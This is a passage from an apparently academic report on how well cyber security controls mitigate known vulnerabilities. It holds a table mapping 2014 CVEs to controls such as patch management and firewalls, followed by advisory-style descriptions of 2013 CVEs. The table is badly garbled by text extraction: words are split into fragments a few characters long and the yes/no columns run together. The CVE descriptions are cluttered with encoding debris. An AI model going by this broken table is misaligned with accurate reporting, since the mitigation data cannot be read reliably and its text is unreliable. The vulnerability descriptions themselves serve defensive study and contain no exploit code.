emen
tC
VE
-20
14
-41
00
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-W
ebsi
teB
lack
listi
ng
S
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
P
atch
Man
agem
ent
CV
E-2
01
4-4
10
5y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tin
g
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Pat
chM
anag
emen
tC
VE
-20
14
-41
14
yy
yy
nN
ot
Mit
igat
edM
itig
ated
-A
nti
-Mal
war
eC
VE
-20
14
-41
27
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-W
ebsi
teB
lack
listi
ng
S
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
P
atch
Man
agem
ent
CV
E-2
01
4-4
13
0y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tin
g
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Pat
chM
anag
emen
tC
VE
-20
14
-41
32
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-W
ebsi
teB
lack
listi
ng
S
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
P
atch
Man
agem
ent
CV
E-2
01
4-4
13
3y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tin
g
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Pat
chM
anag
emen
t
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 17 of 28
CV
ES
ME
1S
ME
2S
ME
3S
ME
4Id
ealis
edN
oC
EW
ith
CE
CV
E-2
01
4-4
14
1y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tin
g
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Pat
chM
anag
emen
tC
VE
-20
14
-44
81
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
An
ti-M
alw
are
CV
E-2
01
4-4
61
7y
yn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lP
atch
Man
agem
ent
CV
E-2
01
4-4
63
1n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
CV
E-2
01
4-6
04
0n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
4-6
10
5n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lP
atch
Man
agem
ent
CV
E-2
01
4-6
13
6n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
P
atch
Man
agem
ent
CV
E-2
01
4-6
36
3y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tin
g
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Pat
chM
anag
emen
tC
VE
-20
14
-63
69
yn
yy
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tin
g
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Pat
chM
anag
emen
tC
VE
-20
14
-63
78
nn
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lP
atch
Man
agem
ent
CV
E-2
01
4-6
48
7n
ny
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
4-7
25
0n
yy
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lP
atch
Man
agem
ent
CV
E-2
01
4-7
92
7y
yy
yn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n(A
cces
sC
on
tro
l)
Pat
chM
anag
emen
tC
VE
-20
14
-79
45
yy
yy
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
14
-84
47
yy
yy
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
An
ti-M
alw
are
Pat
chM
anag
emen
tC
VE
-20
14
-86
38
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-W
ebsi
teB
lack
listi
ng
S
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
P
atch
Man
agem
ent
CV
E-2
01
4-8
83
5y
yy
yy
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
4-9
15
9y
yy
yy
No
tM
itig
ated
Par
tial
lyM
itig
ated
-A
nti
-Mal
war
eP
atch
Man
agem
ent
[Tim
eD
elay
]C
VE
-20
14
-91
63
yy
yy
yN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
An
ti-M
alw
are
Pat
chM
anag
emen
t[T
ime
Del
ay]
CV
E-2
01
4-9
35
0y
yy
yn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lA
nti
-Do
sF
irm
war
eU
pd
ates
CV
E-2
01
4-9
35
7n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
An
ti-M
alw
are
Sec
ure
Co
nfi
gu
rati
on
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 18 of 28
CVE DetailsCVE-2013-0008
rdquowin32ksys in the kernel-mode driversin Microsoft Windows Vista SP2 x000DWindows Server 2008 SP2 R2 and R2 SP1Windows 7 Gold and SP1 x000D Windows8 Windows Server 2012 and Windows RTdoes not properly x000D handle windowbroadcast messages which allows localusers to gain x000D privileges via acrafted application aka rdquordquoWin32k ImproperMessage x000D Handling Vulnerabilityrdquordquordquo
CVE-2013-0022rdquoUse-after-free vulnerability in MicrosoftInternet Explorer 9 allows x000D remoteattackers to execute arbitrary code viaa crafted web site that x000D triggersaccess to a deleted object aka rdquordquoInternetExplorer x000D LsGetTrailInfo Use AfterFree Vulnerabilityrdquordquordquo
CVE-2013-0084rdquoDirectory traversal vulnerability inMicrosoft SharePoint Server 2010 x000DSP1 and SharePoint Foundation 2010 SP1allows remote attackers to x000D bypassintended read restrictions for contentand hijack user x000D accounts via acrafted URL aka rdquordquoSharePoint DirectoryTraversal x000D Vulnerabilityrdquordquordquo
CVE-2013-0140SQL injection vulnerability in the Agent-Handler component in McAfee x000DePolicy Orchestrator (ePO) before 457and 46x before 466 allows x000Dremote attackers to execute arbitrary SQLcommands via a crafted x000D requestover the Agent-Server communicationchannel
CVE-2013-0149The OSPF implementation in Cisco IOS120 through 124 and 150 x000D through153 IOS-XE 2x through 39xS ASA andPIX 7x through 91 x000D FWSMNX-OS and StarOS before 14050488does not properly validate x000D LinkState Advertisement (LSA) type 1 packetsbefore performing x000D operations onthe LSA database which allows remoteattackers to cause x000D a denial ofservice (routing disruption) or obtainsensitive packet x000D information viaa (1) unicast or (2) multicast packetaka Bug IDs x000D CSCug34485CSCug34469 CSCug39762 CSCug63304and CSCug39795
CVE-2013-0172Samba 40x before 401 in certainActive Directory x000D domain-controllerconfigurations does not properly interpretAccess x000D Control Entries that arebased on an objectClass which allowsremote x000D authenticated users tobypass intended restrictions on modifyingLDAP x000D directory objects byleveraging (1) objectClass access by auser (2) x000D objectClass access by agroup or (3) write access to an attribute
CVE-2013-0174The external node classifier (ENC) APIin Foreman before 11 allows x000Dremote attackers to obtain the hashed rootpassword via an API x000D request
CVE-2013-0199The default LDAP ACIs in FreeIPA30 before 312 do not restrict x000Daccess to the (1) ipaNTTrustAuthIncomingand (2) x000D ipaNTTrustAuthOutgoingattributes which allow remote attackersto x000D obtain the Cross-Realm KerberosTrust key via unspecified vectors
CVE-2013-0253The default configuration of Apache Maven304 when using Maven x000D Wagon21 disables SSL certificate checks whichallows remote x000D attackers to spoofservers via a man-in-the-middle (MITM)attack
CVE-2013-0270OpenStack Keystone Grizzly before 20131Folsom and possibly earlier x000D allowsremote attackers to cause a denial of service(CPU and memory x000D consumption)via a large HTTP request as demonstratedby a long x000D tenant name whenrequesting a token
CVE-2013-0481The console in IBM Sterling B2B Integrator51 and 52 and Sterling File Gateway 21and 22 allows remote attackers to readstack traces by triggering (1) an error or(2) an exception
CVE-2013-0598Cross-site request forgery (CSRF)vulnerability in the Web Client in x000DIBM Rational ClearQuest 71 before71212 80 before 8008 and x000D801 before 8011 allows remote attackersto hijack the x000D authentication ofarbitrary users
CVE-2013-0619Adobe Reader and Acrobat 9x before 95310x before 1015 and x000D 11x before1101 allow attackers to execute arbitrarycode or cause x000D a denial of service(memory corruption) via unspecified vectorsa x000D different vulnerability than CVE-2012-1530 CVE-2013-0601 x000D CVE-2013-0605 CVE-2013-0616 CVE-2013-0620 and CVE-2013-0623
CVE-2013-0633Buffer overflow in Adobe Flash Playerbefore 10318351 and 11x before115502149 on Windows and Mac OSX before 10318351 and 11x before112202262 on Linux before 11111132on Android 2x and 3x and before11111537 on Android 4x allows remoteattackers to execute arbitrary code viacrafted SWF content as exploited in thewild in February 2013
CVE-2013-0649Use-after-free vulnerability in AdobeFlash Player before 10318363 and 11xbefore 116602168 on Windows before10318361 and 11x before 116602167on Mac OS X before 10318361 and11x before 112202270 on Linux before11111143 on Android 2x and 3x andbefore 11111547 on Android 4x AdobeAIR before 360597 and Adobe AIR SDKbefore 360599 allows attackers to executearbitrary code via unspecified vectors adifferent vulnerability than CVE-2013-0644
and CVE-2013-1374
CVE-2013-0746Mozilla Firefox before 180 Firefox ESR10x before 10012 and 17x x000Dbefore 1702 Thunderbird before 1702Thunderbird ESR 10x before x000D10012 and 17x before 1702 andSeaMonkey before 215 do not x000Dproperly implement quickstubs that usethe jsval data type for their x000D returnvalues which allows remote attackers toexecute arbitrary code x000D or cause adenial of service (compartment mismatchand application x000D crash) via craftedJavaScript code that is not properly handledduring x000D garbage collection
CVE-2013-0753Use-after-free vulnerability in theserializeToStream implementation x000Din the XMLSerializer component in MozillaFirefox before 180 Firefox x000D ESR10x before 10012 and 17x before1702 Thunderbird before x000D 1702Thunderbird ESR 10x before 10012 and17x before 1702 x000D and SeaMonkeybefore 215 allows remote attackers toexecute arbitrary x000D code via craftedweb content
CVE-2013-0787Use-after-free vulnerability in thensEditorIsPreformatted function x000Din editorlibeditorbasensEditorcppin Mozilla Firefox before x000D1902 Firefox ESR 17x before 1704Thunderbird before 1704 x000DThunderbird ESR 17x before 1704 andSeaMonkey before 2161 allows x000Dremote attackers to execute arbitrarycode via vectors involving an x000DexecCommand call
CVE-2013-0909The XSS Auditor in Google Chrome before2501364152 allows remote attackers toobtain sensitive HTTP Referer informationvia unspecified vectors
CVE-2013-1035The iTunes ActiveX control in Apple iTunesbefore 111 allows remote x000D attackersto execute arbitrary code or cause a denialof service x000D (memory corruption) viaa crafted web site
CVE-2013-1102The Wireless Intrusion Prevention System(wIPS) component on Cisco x000DWireless LAN Controller (WLC) deviceswith software 70 before x000D 70235071 and 72 before 721100 and 73before 731010 x000D allows remoteattackers to cause a denial of service(device reload) x000D via crafted IPpackets aka Bug ID CSCtx80743
CVE-2013-1140The XML parser in Cisco SecurityMonitoring Analysis and Response x000DSystem (MARS) allows remote attackers toread arbitrary files via an x000D externalentity declaration in conjunction with anentity reference x000D related to an XMLExternal Entity (XXE) issue aka Bug IDCSCue55093
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 19 of 28
CVE-2013-1144Memory leak in the IKEv1 implementationin Cisco IOS 151 allows x000D remoteattackers to cause a denial of service(memory consumption) via x000Dunspecified (1) IPv4 or (2) IPv6 IKEpackets aka Bug ID CSCth81055
CVE-2013-1153Cross-site request forgery (CSRF)vulnerability in the web interface x000Din Cisco Prime Infrastructure allowsremote attackers to hijack the x000Dauthentication of arbitrary users aka BugID CSCue84676
CVE-2013-1181Cisco NX-OS on Nexus 5500 devices4x and 5x before 50(3)N2(2) x000DNexus 3000 devices 5x before 50(3)U3(2)and Unified Computing x000D System(UCS) 6200 devices before 20(1w) allowsremote attackers to x000D cause a denialof service (device reload) by sending ajumbo packet to x000D the managementinterface aka Bug IDs CSCtx17544CSCts10593 and x000D CSCtx95389
CVE-2013-1303rdquoUse-after-free vulnerability in MicrosoftInternet Explorer 6 through x000D 10allows remote attackers to execute arbitrarycode via a crafted web x000D site thattriggers access to a deleted object akardquordquoInternet Explorer x000D Use After FreeVulnerabilityrdquordquo a different vulnerabilitythan x000D CVE-2013-1304 and CVE-2013-1338rdquo
CVE-2013-1384Adobe Shockwave Player before 1202122allows attackers to execute arbitrary codeor cause a denial of service (memorycorruption) via unspecified vectors adifferent vulnerability than CVE-2013-1386
CVE-2013-1388Unspecified vulnerability in AdobeColdFusion 90 before Update 10 x000D901 before Update 9 902 before Update4 and 10 before Update 9 x000D allowsattackers to obtain administrator-consoleaccess via unknown x000D vectors
CVE-2013-1450Microsoft Internet Explorer 8 and 9 whenthe Proxy Settings x000D configurationhas the same Proxy address and Portvalues in the HTTP x000D and Securerows does not properly reuse TCPsessions to the proxy x000D server whichallows remote attackers to obtain sensitiveinformation x000D intended for a specifichost via a crafted HTML document thattriggers x000D many HTTPS requests andthen triggers an HTTP request to thathost as x000D demonstrated by reading aCookie header aka MSRC 12096gd
CVE-2013-1472Unspecified vulnerability in the JavaFXcomponent in Oracle Java SE x000DJavaFX 224 and earlier allows remoteattackers to affect x000D confidentialityintegrity and availability via unknownvectors a x000D different vulnerabilitythan other CVEs listed in the February2013 x000D CPU
CVE-2013-1553Unspecified vulnerability in the OracleWeb Services Manager component x000Din Oracle Fusion Middleware 111160allows remote attackers to x000D affect
confidentiality and integrity via unknownvectors related to x000D Web ServicesSecurity
CVE-2013-1620The TLS implementation in MozillaNetwork Security Services (NSS)does x000D not properly considertiming side-channel attacks on anoncompliant x000D MAC checkoperation during the processing ofmalformed CBC padding x000D whichallows remote attackers to conductdistinguishing attacks and x000D plaintext-recovery attacks via statistical analysis oftiming data for x000D crafted packets arelated issue to CVE-2013-0169
CVE-2013-1627Absolute path traversal vulnerability inNTWebServerexe in Indusoft x000DStudio 70 and earlier and AdvantechStudio 70 and earlier allows x000D remoteattackers to read arbitrary files via a fullpathname in an x000D argument to thesub 401A90 CreateFileW function
CVE-2013-1638Opera before 1213 allows remote attackersto execute arbitrary code x000D via craftedclipPaths in an SVG document
CVE-2013-1669Multiple unspecified vulnerabilities in thebrowser engine in Mozilla x000D Firefoxbefore 210 allow remote attackers tocause a denial of x000D service (memorycorruption and application crash) or possiblyexecute x000D arbitrary code via unknownvectors
CVE-2013-1676The SelectionIteratorGetNextSegmentfunction in Mozilla Firefox before210 Firefox ESR 17x before 1706Thunderbird before 1706 andThunderbird ESR 17x before 1706 allowsremote attackers to execute arbitrary codeor cause a denial of service (out-of-boundsread) via unspecified vectors
CVE-2013-1700The Mozilla Maintenance Service in MozillaFirefox before 220 on x000D Windowsdoes not properly handle inability to launchthe Mozilla x000D Updater executablefile which allows local users to gainprivileges x000D via vectors involvingplacement of a Trojan horse executable fileat x000D an arbitrary location
CVE-2013-1734Cross-site request forgery (CSRF)vulnerability in attachmentcgi in x000DBugzilla 2x 3x and 40x before 401141x and 42x before x000D 427and 43x and 44x before 441 allowsremote attackers to x000D hijack theauthentication of arbitrary users for requeststhat commit x000D an attachment changevia an update action
CVE-2013-1777The JMX Remoting functionality in ApacheGeronimo 3x before 301 as x000D usedin IBM WebSphere Application Server(WAS) Community Edition x000D 3003and other products does not properlyimplement the RMI x000D classloaderwhich allows remote attackers to executearbitrary code x000D by using the JMXconnector to send a crafted serializedobject
CVE-2013-2319FileMaker Pro before 12 and Pro Advancedbefore 12 does not verify x000D X509certificates from SSL servers whichallows man-in-the-middle x000D attackersto spoof servers and obtain sensitiveinformation via a x000D crafted certificate
CVE-2013-2340Unspecified vulnerability on the HPProCurve JCA JCBJDA JDB JEAJFA JFB JFCJGA 658250-B21 and 658247-B21HP 3COM routers and switches and HPH3C routers and switches allows remoteattackers to execute arbitrary code orobtain sensitive information via unknownvectors
CVE-2013-2350Unspecified vulnerability in HP StorageData Protector 62X allows x000D remoteattackers to execute arbitrary code or causea denial of x000D service via unknownvectors aka ZDI-CAN-1897
CVE-2013-2492Stack-based buffer overflow in Firebird213 through 215 before x000D 18514and 251 through 253 before 26623 onWindows allows remote x000D attackersto execute arbitrary code via a craftedpacket to TCP port x000D 3050 relatedto a missing size check during extractionof a group x000D number from CNCTinformation
CVE-2013-2507Multiple cross-site scripting (XSS)vulnerabilities in the Brother MFC-9970CDW printer with firmware G (103)allow remote attackers to inject arbitraryweb script or HTML via the (1) id parameterto adminlog to nethtml or (2) kindparameter to faxcopy settingshtml adifferent vulnerability than CVE-2013-2670and CVE-2013-2671
CVE-2013-2736Adobe Reader and Acrobat 9x before 95510x before 1017 and x000D 11x before11003 allow attackers to execute arbitrarycode or cause x000D a denial of service(memory corruption) via unspecified vectorsa x000D different vulnerability than CVE-2013-2718 CVE-2013-2719 x000D CVE-2013-2720 CVE-2013-2721 CVE-2013-2722 CVE-2013-2723 x000D CVE-2013-2725 CVE-2013-2726 CVE-2013-2731CVE-2013-2732 x000D CVE-2013-2734CVE-2013-2735 CVE-2013-3337 CVE-2013-3338 x000D CVE-2013-3339 CVE-2013-3340 and CVE-2013-3341
CVE-2013-2780Siemens SIMATIC S7-1200 PLCs 2x and3x allow remote attackers to x000D causea denial of service (defect-mode transitionand control outage) x000D via craftedpackets to UDP port 161 (aka the SNMPport)
CVE-2013-2803ProSoft RadioLinx ControlScape before600040 uses a deficient PRNG x000Dalgorithm and seeding strategy forpassphrases which makes it easier x000Dfor remote attackers to obtain access via abrute-force attack
CVE-2013-2824Schneider Electric StruxureWare SCADAExpert Vijeo Citect 740 Vijeo x000D
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 20 of 28
Citect 720 through 730SP1 CitectSCADA720 through 730SP1 x000DStruxureWare PowerSCADA Expert 730through 730SR1 and PowerLogic x000DSCADA 720 through 720SR1 do notproperly handle exceptions which x000Dallows remote attackers to cause a denialof service via a crafted x000D packet
CVE-2013-2826WellinTech KingSCADA before312 KingAlarmampEvent before 31and x000D KingGraphic before 312perform authentication on the x000DKAEClientManager console rather than onthe server which allows x000D remoteattackers to bypass intended accessrestrictions and discover x000D credentialsvia a crafted packet to TCP port 8130
CVE-2013-2920The DoResolveRelativeHost functionin urlurl canon relativecc in x000DGoogle Chrome before 300159966 allowsremote attackers to cause a x000Ddenial of service (out-of-bounds read)via a relative URL containing a x000Dhostname as demonstrated by a protocol-relative URL beginning with a x000Dwwwgooglecom substring
CVE-2013-3064Open redirect vulnerability inuidynamicunsecuredhtml inLinksys x000D EA6500 with firmware1128147876 allows remote attackers toredirect x000D users to arbitrary web sitesand conduct phishing attacks via a URLin x000D the target parameter
CVE-2013-3116rdquoMicrosoft Internet Explorer 7 through 9allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquordquo
CVE-2013-3137rdquoMicrosoft FrontPage 2003 SP3 does notproperly parse DTDs which allows remoteattackers to obtain sensitive information viacrafted XML data in a FrontPage documentaka rdquordquoXML Disclosure Vulnerabilityrdquordquordquo
CVE-2013-3194rdquoMicrosoft Internet Explorer 9 allows remoteattackers to execute x000D arbitrary codeor cause a denial of service (memorycorruption) via a x000D crafted website aka rdquordquoInternet Explorer MemoryCorruption x000D Vulnerabilityrdquordquordquo
CVE-2013-3199rdquoMicrosoft Internet Explorer 6 through10 allows remote attackers to x000Dexecute arbitrary code or cause a denialof service (memory x000D corruption)via a crafted web site aka rdquordquoInternetExplorer Memory x000D CorruptionVulnerabilityrdquordquordquo
CVE-2013-3201rdquoMicrosoft Internet Explorer 9 and 10allows remote attackers to x000D executearbitrary code or cause a denial ofservice (memory x000D corruption) via acrafted web site aka rdquordquoInternet ExplorerMemory x000D Corruption Vulnerabilityrdquordquoa different vulnerability than x000D CVE-2013-3203 CVE-2013-3206 CVE-2013-3207 and CVE-2013-3209rdquo
CVE-2013-3206
rdquoMicrosoft Internet Explorer 9 and 10allows remote attackers to x000D executearbitrary code or cause a denial ofservice (memory x000D corruption) via acrafted web site aka rdquordquoInternet ExplorerMemory x000D Corruption Vulnerabilityrdquordquoa different vulnerability than x000D CVE-2013-3201 CVE-2013-3203 CVE-2013-3207 and CVE-2013-3209rdquo
CVE-2013-3280EMC RSA Authentication Agent 71xbefore 712 for Web for Internet x000DInformation Services has a fail-open designwhich allows remote x000D attackers tobypass intended access restrictions viavectors that x000D trigger an agent crash
CVE-2013-3387Cisco Prime Central for HostedCollaboration Solution (HCS)Assurance x000D 86 and 9x before 92(1)allows remote attackers to cause a denialof x000D service (disk consumption) via aflood of TCP packets to port 5400 x000Dleading to large error-log files aka Bug IDCSCua42724
CVE-2013-3417The administrative web interface in CiscoVideo Surveillance Operations Managerdoes not properly perform authenticationwhich allows remote attackers to watchvideo feeds via a crafted URL aka BugID CSCtg72262
CVE-2013-3632The Cron service in rpcphp inOpenMediaVault allows remote x000Dauthenticated users to execute cron jobs asarbitrary users and x000D execute arbitrarycommands via the username parameter
CVE-2013-3656Cybozu Office 910 and earlier doesnot properly manage sessions x000Dwhich allows remote attackers to bypassauthentication by leveraging x000Dknowledge of a login URL
CVE-2013-3856rdquoMicrosoft Word 2003 SP3 and WordViewer allow remote attackers to x000Dexecute arbitrary code or cause a denialof service (memory x000D corruption)via a crafted Office document akardquordquoWord Memory Corruption x000DVulnerabilityrdquordquordquo
CVE-2013-3860rdquoMicrosoft NET Framework 20 SP2 3535 SP1 351 4 and 45 does x000Dnot properly parse a DTD during XMLdigital-signature validation x000D whichallows remote attackers to cause adenial of service x000D (application crashor hang) via a crafted signed XMLdocument aka x000D rdquordquoEntity ExpansionVulnerabilityrdquordquordquo
CVE-2013-3893Use-after-free vulnerability in theSetMouseCapture implementationin x000D mshtmldll in MicrosoftInternet Explorer 6 through 11 allowsremote x000D attackers to executearbitrary code via crafted JavaScript stringsas x000D demonstrated by use of an ms-help URL that triggers loading of x000Dhxdsdll
CVE-2013-3897rdquoUse-after-free vulnerability in theCDisplayPointer class in mshtmldll in
Microsoft Internet Explorer 6 through 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via crafted JavaScript code thatuses the onpropertychange event handleras exploited in the wild in September andOctober 2013 aka rdquordquoInternet ExplorerMemory Corruption Vulnerabilityrdquordquordquo
CVE-2013-3900rdquoThe WinVerifyTrust function in MicrosoftWindows XP SP2 and SP3 Windows Server2003 SP2 Windows Vista SP2 WindowsServer 2008 SP2 and R2 SP1 Windows 7SP1 Windows 8 Windows 81 WindowsServer 2012 Gold and R2 and Windows RTGold and 81 does not properly validate PEfile digests during Authenticode signatureverification which allows remote attackersto execute arbitrary code via a craftedPE file aka rdquordquoWinVerifyTrust SignatureValidation Vulnerabilityrdquordquordquo
CVE-2013-3905rdquoMicrosoft Outlook 2007 SP3 2010 SP1and SP2 2013 and 2013 RT does x000Dnot properly expand metadata containedin SMIME certificates which x000Dallows remote attackers to obtain sensitivenetwork configuration and x000D stateinformation via a crafted certificate in an e-mail message aka x000D rdquordquoSMIME AIAVulnerabilityrdquordquordquo
CVE-2013-4223The Gentoo Nullmailer package before 111-r2 uses world-readable x000D permissionsfor etcnullmailerremotes which allowslocal users to x000D obtain SMTPauthentication credentials by reading thefile
CVE-2013-4436The default configuration for salt-ssh inSalt (aka SaltStack) 0170 x000D doesnot validate the SSH host key of requestswhich allows remote x000D attackers tohave unspecified impact via a man-in-the-middle (MITM) x000D attack
CVE-2013-4478Sup before 01321 and 014x before01411 allows remote attackers x000Dto execute arbitrary commands via shellmetacharacters in the filename x000D ofan email attachment
CVE-2013-4529Buffer overflow in hwpcipcie aerc inQEMU before 172 allows x000D remoteattackers to cause a denial of service andpossibly execute x000D arbitrary code viaa large log num value in a savevm image
CVE-2013-4555Cross-site request forgery(CSRF) vulnerability in x000Decrireactionlogoutphp in SPIP before2124 allows remote attackers x000D tohijack the authentication of arbitrary usersfor requests that x000D logout the uservia unspecified vectors
CVE-2013-4776NETGEAR ProSafe GS724Tv3 andGS716Tv2 with firmware 54113and x000D earlier GS748Tv454114 and GS510TP 5044 allowsremote x000D attackers to cause adenial of service (reboot or crash) viaa crafted x000D HTTP request tofilesystem
CVE-2013-4782
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 21 of 28
The Supermicro BMC implementationallows remote attackers to bypass x000Dauthentication and execute arbitrary IPMIcommands by using cipher x000D suite 0(aka cipher zero) and an arbitrary password
CVE-2013-5057rdquohxdsdll in Microsoft Office 2007 SP3 and2010 SP1 and SP2 does not implementthe ASLR protection mechanism whichmakes it easier for remote attackers toexecute arbitrary code via a crafted COMcomponent on a web site that is visitedwith Internet Explorer as exploited in thewild in December 2013 aka rdquordquoHXDS ASLRVulnerabilityrdquordquordquo
CVE-2013-5369IBM SPSS Analytical Decision Management61 before IF1 62 before x000D IF1 and70 before FP1 IF6 might allow remoteattackers to execute x000D arbitrary codeby deploying and accessing a service
CVE-2013-5428IBM WebSphere DataPower XC10appliances 250 do not require x000Dauthentication for all administrative actionswhich allows remote x000D attackers tocause a denial of service via unspecifiedvectors
CVE-2013-5431Open redirect vulnerability in IBM TivoliFederated Identity Manager x000D(TFIM) 611 before IF 15 620 beforeIF 14 621 and 622 before x000D IF8 and Tivoli Federated Identity ManagerBusiness Gateway (TFIMBG) x000D 611before IF 15 620 before IF 14 621 and622 before IF 8 x000D allows remoteattackers to redirect users to arbitrary websites and x000D conduct phishing attacksvia unspecified vectors
CVE-2013-5494Cross-site request forgery (CSRF)vulnerability in the web framework x000Din Cisco Unified MeetingPlace Solution asused in Unified x000D MeetingPlace WebConferencing and Unified MeetingPlaceallows remote x000D attackers to hijackthe authentication of arbitrary usersaka Bug IDs x000D CSCui45209 andCSCui44674
CVE-2013-5507The IPsec implementation in Cisco AdaptiveSecurity Appliance (ASA) x000D Software91 before 91(17) when an IPsec VPNtunnel is enabled x000D allows remoteattackers to cause a denial of service (devicereload) x000D via a (1) ICMP or (2)ICMPv6 packet that is improperly handledduring x000D decryption aka Bug IDCSCue18975
CVE-2013-5536Cisco Secure Access Control System (ACS)does not properly implement x000D anincoming-packet firewall rule which allowsremote attackers to x000D cause a denialof service (process crash) via a floodof crafted x000D packets aka Bug IDCSCui51521
CVE-2013-5559Buffer overflow in the Active TemplateLibrary (ATL) framework in the x000DVPNAPI COM module in Cisco AnyConnectSecure Mobility Client 2x x000D allowsuser-assisted remote attackers to executearbitrary code via a x000D crafted HTMLdocument aka Bug ID CSCuj58139
CVE-2013-5561The Safe Search enforcement feature inCisco Adaptive Security x000D Appliance(ASA) CX Context-Aware SecuritySoftware does not properly x000D performfiltering which allows remote attackers tobypass intended x000D policy restrictionsvia unspecified vectors aka Bug IDCSCui94622
CVE-2013-5751Directory traversal vulnerability in SAPNetWeaver 7x allows remote x000Dattackers to read arbitrary files viaunspecified vectors
CVE-2013-5757Absolute path traversal vulnerability inYealink VoIP Phone SIP-T38G allowsremote authenticated users to readarbitrary files via a full pathname in thedumpConfigFile function in the commandparameter to cgi-bincgiServerexx
CVE-2013-5828Unspecified vulnerability in the EnterpriseManager Base Platform x000D componentin Oracle Enterprise Manager Grid ControlEM Base Platform x000D 10205 and11101 EM DB Control 11107 11202and 11203 x000D and EM Pluginfor DB 12102 and 12103 allowsremote attackers to x000D affect integrityvia unknown vectors related to StorageManagement
CVE-2013-6167Mozilla Firefox through 27 sends HTTPCookie headers without first x000Dvalidating that they have the requiredcharacter-set restrictions x000D whichallows remote attackers to conduct theequivalent of a x000D persistent LogoutCSRF attack via a crafted parameterthat forces a x000D web application toset a malformed cookie within an HTTPresponse
CVE-2013-6188Cross-site request forgery (CSRF)vulnerability in HP System x000DManagement Homepage (SMH) 71through 722 allows remote attackersto x000D hijack the authentication ofunspecified victims via unknown vectors
CVE-2013-6284rdquoUnspecified vulnerability in the StatutoryReporting for Insurance x000D (FS SR)component in the Financial Servicesmodule for SAP ERP Central x000DComponent (ECC) allows attackersto execute arbitrary code via x000Dunspecified vectors related to a rdquordquocodeinjection vulnerabilityrdquordquordquo
CVE-2013-6396The OpenStack Python client libraryfor Swift (python-swiftclient) 10 x000Dthrough 190 does not verify X509certificates from SSL servers x000D whichallows man-in-the-middle attackers tospoof servers and obtain x000D sensitiveinformation via a crafted certificate
CVE-2013-6475Multiple integer overflows in (1)OPVPOutputDevcxx and (2) x000DoprsOPVPSplashcxx in the pdftoopvpfilter in CUPS and cups-filters x000Dbefore 1047 allow remote attackers toexecute arbitrary code via a x000D craftedPDF file which triggers a heap-based bufferoverflow
CVE-2013-6660The drag-and-drop implementation inGoogle Chrome before 3301750117 doesnot properly restrict the information inWebDropData data structures which allowsremote attackers to discover full pathnamesvia a crafted web site
CVE-2013-6699The Control and Provisioning of WirelessAccess Points (CAPWAP) x000D protocolimplementation on Cisco Wireless LANController (WLC) devices x000D allowsremote attackers to cause a denial of servicevia a crafted x000D CAPWAP packet thattriggers a buffer over-read aka Bug IDCSCuh81880
CVE-2013-6702The management implementation on CiscoONS 15454 controller cards with x000Dsoftware 98 and earlier allows remoteattackers to cause a denial of x000Dservice (card reset) via crafted packets akaBug ID CSCtz50902
CVE-2013-6979The VTY authentication implementation inCisco IOS XE 0302xxSE and 0303xxSEincorrectly relies on the Linux-IOS internal-network configuration which allows remoteattackers to bypass authentication byleveraging access to a 192168x2 sourceIP address aka Bug ID CSCuj90227
CVE-2013-6994OpenText Exceed OnDemand (EoD) 8transmits the session ID in x000D cleartextwhich allows remote attackers to performsession fixation x000D attacks by sniffingthe network
